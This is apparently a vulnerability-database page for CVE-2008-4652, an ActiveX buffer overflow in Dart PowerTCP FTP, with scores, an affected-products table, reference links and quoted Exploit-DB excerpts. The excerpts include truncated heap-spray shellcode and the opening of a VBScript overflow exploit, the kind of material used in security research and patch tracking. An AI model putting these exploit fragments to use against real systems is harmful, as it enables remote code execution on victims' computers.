CVE-2008-4652
published 2008-10-22CVE-2008-4652: Buffer overflow in the ActiveX control (DartFtp.dll) in Dart Communications PowerTCP FTP for ActiveX 2.0.2 0 allows remote attackers to execute arbitrary code…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
10.11%
95.1th percentile
Buffer overflow in the ActiveX control (DartFtp.dll) in Dart Communications PowerTCP FTP for ActiveX 2.0.2 0 allows remote attackers to execute arbitrary code via a long SecretKey property.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dart | powertcp_ftp_for_activex | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PowerTCP FTP Module - Multiple Techniques (SEH HeapSpray)
exploitdb·2008-10-26
CVE-2008-4652 PowerTCP FTP Module - Multiple Techniques (SEH HeapSpray)
PowerTCP FTP Module - Multiple Techniques (SEH HeapSpray)
---
Snoop Security Research committee
-->
// clac.exe
var shellcode = unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08
Exploit-DB
Dart Communications PowerTCP FTP module - Remote Buffer Overflow
exploitdb·2008-10-20
CVE-2008-4652 Dart Communications PowerTCP FTP module - Remote Buffer Overflow
Dart Communications PowerTCP FTP module - Remote Buffer Overflow
---
Author: Intel
Discovered by: Intel
Software: PowerTCP ActiveX
Vulnerable Component: DartFtp.dll
Version: 2.0.2.0
Website: www.dart.com
Description:
"PowerTCP tools from Dart Communications are comprehensive tools you can
include in your programs to perform common TCP/IP functions, including FTP,
HTTP, SMTP, POP3, telnet, and SNMP. In addition, Dart supplies a series of
other tools, such as a Zip compressor and a VT320 terminal emulator. This
review, however, will focus only on two tools: the FTP Tool and the Mail Tool,
which supports SMTP and POP3."
RegKey Safe for Script: False
RegkeySafe for Init: True
KillBitSet: False
Tested on Vista SP1 fully patched and IE7
Sub Launch
buff = String (1684, "A")
RET = unes
No writeups or analysis indexed.
http://securityreason.com/securityalert/4458http://www.securityfocus.com/bid/31814https://exchange.xforce.ibmcloud.com/vulnerabilities/45975https://www.exploit-db.com/exploits/6793https://www.exploit-db.com/exploits/6840http://securityreason.com/securityalert/4458http://www.securityfocus.com/bid/31814https://exchange.xforce.ibmcloud.com/vulnerabilities/45975https://www.exploit-db.com/exploits/6793https://www.exploit-db.com/exploits/6840
2008-10-22
Published